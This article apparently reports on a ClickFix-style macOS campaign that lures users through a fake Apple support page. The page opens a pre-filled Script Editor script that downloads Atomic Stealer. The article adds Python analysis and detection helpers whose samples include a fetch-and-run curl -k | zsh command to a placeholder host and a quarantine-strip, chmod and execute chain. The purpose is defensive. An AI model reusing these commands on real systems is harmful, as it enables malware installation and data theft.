A newly identified ClickFix-style macOS attack demonstrates how threat actors are refining their techniques to evade security defenses. The campaign moves away from the traditional reliance on Terminal and instead uses macOS Script Editor as the primary execution vector. This change allows attackers to bypass controls designed to detect or block suspicious Terminal activity.
The shift is notable because it preserves the familiar ClickFix social engineering approach while altering how malicious commands are executed. By rerouting execution through macOS Script Editor, the attack reduces exposure to newer protections and introduces a different pathway that may be less scrutinized by both users and security tools.
A Shift in ClickFix-Style macOS Attack Techniques
For years, ClickFix campaigns have relied on social engineering that tricks users into copying and pasting malicious commands into the Terminal app, with the instructions disguised as troubleshooting steps or routine maintenance tasks. The newly discovered ClickFix-style macOS attack keeps that lure but abandons the Terminal copy-and-paste step entirely.
Instead, attackers now leverage macOS Script Editor as the primary execution vector. While Script Editor has previously been abused for malware delivery, its use in this context, combined with a browser-triggered workflow, represents a shift in strategy. Notably, the attack is initiated through an Apple-themed webpage, which plays a central role in deceiving users.
Jamf researchers noted that Apple attempted to mitigate Terminal-based abuse in macOS 26.4 by introducing a feature that scans pasted commands before execution. While this adds friction, attackers have responded by simply moving to a different tool, demonstrating the ongoing cat-and-mouse dynamic in cybersecurity.
The Role of the Apple-Themed Webpage
The attack begins with a convincing Apple-themed webpage designed to look like an official support page titled “Reclaim disk space on your Mac.” The page provides step-by-step instructions that closely mimic legitimate system maintenance guidance.

Users are instructed to run a cleanup script to free up storage space. When they click the “Execute” button, the page triggers an applescript:// URL scheme, which initiates the next stage of the attack.
This mechanism introduces several key differences from traditional ClickFix campaigns:
- The browser invokes the applescript:// URL scheme
- The browser prompts the user to allow Script Editor to open the link
- A pre-filled script appears automatically inside macOS Script Editor
- The user is encouraged to execute the script
This workflow reduces the need for manual input, making the attack smoother and potentially more convincing.
Execution Flow and Obfuscation
Once inside macOS Script Editor, the user is presented with a script that appears to perform legitimate cleanup operations. However, behind the scenes, the script executes an obfuscated shell command.
The command uses string manipulation via the tr utility to decode a hidden URL at runtime. Once decoded, it resolves to a remote server hosting the malicious payload. The command follows a familiar structure:
- Obfuscation: Encoded strings are transformed into valid URLs.
- Payload retrieval: A curl request fetches remote content, with the -k (--insecure) flag disabling TLS certificate validation, so an untrusted or mismatched certificate on the attacker's server does not interrupt the download.
- Execution: The downloaded content is piped directly into zsh, so the first-stage script runs without ever being written to disk as a file.
If successful, this step delivers a second-stage payload, which is further obfuscated using base64 encoding and gzip compression.
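Putting the browser handoff and the obfuscated command together, here is an added analysis helper written for this page (it is not Jamf's tooling or the campaign's code). It takes an applescript:// URL of the kind a malicious page would emit, recovers the pre-filled script, pulls out its do shell script command, emulates the tr mapping to reveal the hidden URL, and flags the curl -k ... | zsh download-and-run pattern. The query form applescript://com.apple.scripteditor?action=new&script=... is the publicly documented shape of the scheme and is assumed here; the sample script, its ROT13-style tr alphabet and the example.test URL are constructed for illustration and are not indicators from the campaign.

```python
import re
from urllib.parse import parse_qs, quote, urlparse

# Constructed sample (not from the campaign): an AppleScript that looks like a
# cleanup helper but decodes a ROT13-style string with tr, fetches the result
# with curl -k and pipes the body into zsh. example.test is a placeholder host.
SAMPLE_APPLESCRIPT = (
    'display dialog "Reclaiming disk space..." buttons {"OK"}\n'
    "do shell script \"curl -k -s $(echo 'uggcf://rknzcyr.grfg/pyrnahc.fu' "
    "| tr 'A-Za-z' 'N-ZA-Mn-za-m') | zsh\"\n"
)
# Assumed form of the Script Editor URL scheme: action=new opens a fresh
# document whose contents come from the percent-encoded script parameter.
SAMPLE_URL = "applescript://com.apple.scripteditor?action=new&script=" + quote(
    SAMPLE_APPLESCRIPT, safe=""
)

DO_SHELL = re.compile(r'do shell script "((?:[^"\\]|\\.)*)"')
TR_PIPE = re.compile(r"echo\s+(?:-n\s+)?'([^']*)'\s*\|\s*tr\s+'([^']*)'\s+'([^']*)'")
# -k or --insecure, including when -k is folded into a combined short flag like -ks
CURL_INSECURE = re.compile(r"(^|\s)(--insecure|-[a-zA-Z]*k[a-zA-Z]*)(?=\s|$)")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(zsh|bash|sh)\b")


def script_from_url(url):
    """Return the script text the browser would hand to Script Editor."""
    parsed = urlparse(url)
    if parsed.scheme.lower() != "applescript":
        raise ValueError("not an applescript:// URL")
    params = parse_qs(parsed.query, keep_blank_values=True)
    if "script" not in params:
        raise ValueError("no script parameter")
    return params["script"][0]


def shell_commands(applescript):
    """Extract the body of every do shell script call and unescape it."""
    return [
        m.group(1).replace('\\"', '"').replace("\\\\", "\\")
        for m in DO_SHELL.finditer(applescript)
    ]


def expand_tr_set(spec):
    """Expand tr ranges such as A-Za-z into the full character list."""
    out, i = [], 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":
            out.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            out.append(spec[i])
            i += 1
    return "".join(out)


def emulate_tr(text, set1, set2):
    """Apply tr SET1 SET2 semantics: map by position, padding SET2 with its last char."""
    src, dst = expand_tr_set(set1), expand_tr_set(set2)
    if not src or not dst:
        return text
    dst = (dst + dst[-1] * len(src))[: len(src)]
    return text.translate(str.maketrans(src, dst))


def analyze_command(cmd):
    """Decode tr-obfuscated strings and flag the curl -k ... | zsh pattern."""
    report = {"decoded_urls": [], "insecure_tls": False, "piped_into_shell": None}
    for encoded, set1, set2 in TR_PIPE.findall(cmd):
        decoded = emulate_tr(encoded, set1, set2)
        report["decoded_urls"] += re.findall(r"https?://\S+", decoded)
    if re.search(r"\bcurl\b", cmd) and CURL_INSECURE.search(cmd):
        report["insecure_tls"] = True
    pipe = PIPE_TO_SHELL.search(cmd)
    if pipe:
        report["piped_into_shell"] = pipe.group(1)
    report["suspicious"] = bool(report["decoded_urls"]) and pipe is not None
    return report


def analyze_applescript_url(url):
    """One report per do shell script call found in the URL's script payload."""
    return [analyze_command(c) for c in shell_commands(script_from_url(url))]


if __name__ == "__main__":
    for r in analyze_applescript_url(SAMPLE_URL):
        print(r)
```

The tr emulation covers the plain SET1 SET2 mapping form, including range expansion and the padding rule for a shorter SET2; variants that use tr -d or tr -s, or double-quoted arguments, would need additional handling. Running the same helper against proxy logs or captured page source gives a quick way to triage any applescript:// link before a user clicks it.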
Second-Stage Payload and Atomic Stealer
After decoding, the second-stage script downloads a Mach-O executable file to the /tmp directory. The script performs several actions:
- Downloads the binary from a remote server
- Removes extended file attributes, which strips the com.apple.quarantine flag and so sidesteps the Gatekeeper check a freshly downloaded file would otherwise receive on first launch
- Assigns execution permissions
- Executes the binary
The final payload has been identified as a variant of Atomic Stealer, an infostealer known for targeting sensitive user data.
This staged delivery method allows attackers to keep the initial script small and less detectable while reserving the primary malicious functionality for later execution.
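The staged behavior described above gives defenders a concrete sequence to hunt for on the endpoint. The following is an added example, not Jamf's detection content or the campaign's code, that runs three rules over a constructed set of process-execution events in a hypothetical JSON-lines schema: a curl or shell command descended from Script Editor that disables certificate checks or pipes into a shell; the xattr strip, chmod +x, execute chain against the same file path; and a match on the SHA256 published for the helper binary. The event fields (ts, pid, ppid, exe, argv, sha256) are an assumption and real EDR or Endpoint Security telemetry will name them differently. The Script Editor path and the fact that do shell script runs its command through /bin/sh are standard macOS behavior, and the sample events are constructed.

```python
import json
import re

# Published IOC from the write-up: SHA256 of the "helper" Mach-O dropped to /tmp.
KNOWN_BAD_SHA256 = {"3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44"}
SCRIPT_EDITOR = "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"
SHELLS = {"/bin/sh", "/bin/zsh", "/bin/bash"}
INSECURE = re.compile(r"(^|\s)(-k|--insecure)(?=\s|$)")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(zsh|bash|sh)\b")

# Constructed process telemetry (hypothetical JSON-lines schema, not real logs).
# do shell script runs through /bin/sh, so the shell is a child of Script Editor.
# Events 9 and 10 are a benign developer making a tool executable, as a decoy.
SAMPLE_EVENTS = """
{"ts": 1, "pid": 501, "ppid": 1, "exe": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor", "argv": ["Script Editor"]}
{"ts": 2, "pid": 510, "ppid": 501, "exe": "/bin/sh", "argv": ["sh", "-c", "curl -k -s https://example.test/cleanup.sh | zsh"]}
{"ts": 3, "pid": 511, "ppid": 510, "exe": "/usr/bin/curl", "argv": ["curl", "-k", "-s", "https://example.test/cleanup.sh"]}
{"ts": 4, "pid": 512, "ppid": 510, "exe": "/bin/zsh", "argv": ["zsh"]}
{"ts": 5, "pid": 520, "ppid": 512, "exe": "/usr/bin/curl", "argv": ["curl", "-s", "-o", "/tmp/helper", "https://example.test/helper"]}
{"ts": 6, "pid": 521, "ppid": 512, "exe": "/usr/bin/xattr", "argv": ["xattr", "-c", "/tmp/helper"]}
{"ts": 7, "pid": 522, "ppid": 512, "exe": "/bin/chmod", "argv": ["chmod", "+x", "/tmp/helper"]}
{"ts": 8, "pid": 523, "ppid": 512, "exe": "/tmp/helper", "argv": ["/tmp/helper"], "sha256": "3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44"}
{"ts": 9, "pid": 600, "ppid": 400, "exe": "/bin/chmod", "argv": ["chmod", "+x", "/Users/dev/bin/tool"]}
{"ts": 10, "pid": 601, "ppid": 400, "exe": "/Users/dev/bin/tool", "argv": ["tool"]}
"""


def load_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestry(by_pid, pid):
    """Walk ppid links upward and return the executable of each ancestor."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["exe"])
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    by_pid = {e["pid"]: e for e in events}
    alerts = []

    # Rule 1: curl, or a shell running a -c command, under Script Editor that
    # disables TLS validation or pipes its download into another shell.
    for e in events:
        is_curl = e["exe"] == "/usr/bin/curl"
        is_shell_cmd = e["exe"] in SHELLS and "-c" in e["argv"]
        if not (is_curl or is_shell_cmd):
            continue
        if SCRIPT_EDITOR not in ancestry(by_pid, e["ppid"]):
            continue
        cmd = " ".join(e["argv"])
        if INSECURE.search(cmd) or PIPE_TO_SHELL.search(cmd):
            alerts.append({"rule": "script_editor_spawned_downloader", "pid": e["pid"], "cmd": cmd})

    # Rule 2: quarantine attribute stripped, then chmod +x, then execution of
    # the same path. Rule 3: executable hash matches the published IOC.
    stages = {}  # path -> set of stages observed so far, in time order
    for e in sorted(events, key=lambda x: x["ts"]):
        argv = e["argv"]
        if e["exe"] == "/usr/bin/xattr" and ("-c" in argv or "com.apple.quarantine" in argv):
            stages.setdefault(argv[-1], set()).add("xattr")
        elif e["exe"] == "/bin/chmod" and (any(a.startswith("+") and "x" in a for a in argv) or "755" in argv):
            stages.setdefault(argv[-1], set()).add("chmod")
        elif e["exe"] in stages and {"xattr", "chmod"} <= stages[e["exe"]]:
            alerts.append({"rule": "quarantine_strip_then_exec", "pid": e["pid"], "path": e["exe"]})
        if e.get("sha256") in KNOWN_BAD_SHA256:
            alerts.append({"rule": "known_atomic_stealer_hash", "pid": e["pid"], "path": e["exe"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_EVENTS)):
        print(alert)
```

Rule 1 fires twice on the sample (once for the sh -c command line, once for the curl child), Rule 2 fires only for /tmp/helper and ignores the developer's chmod because no quarantine strip preceded it, and Rule 3 is a straight hash lookup. The path correlation in Rule 2 is the part worth keeping even if the hash changes in the next variant.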
Behavior Across macOS Versions
The behavior of macOS Script Editor during this attack varies depending on the operating system version. On macOS 26.0, the script opens directly, allowing immediate execution. However, macOS 26.4 introduces additional safeguards.
In newer versions, users see a warning indicating that the script originates from an unidentified developer. They must explicitly permit the creation and execution of the script document, adding another layer of user interaction.
Despite this, the attack still succeeds if users follow the prompts, highlighting the continued effectiveness of social engineering.
Indicators of Compromise
The researchers identified several indicators associated with this ClickFix-style macOS attack:
- Domain: dryvecar[.]com (linked to the infostealer payload)
- Malicious webpages:
- storage-fixes.squarespace[.]com
- cleanupmac.mssg[.]me
- File: helper (Mach-O executable)
- SHA256: 3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44
These indicators can help security teams detect and respond to related threats.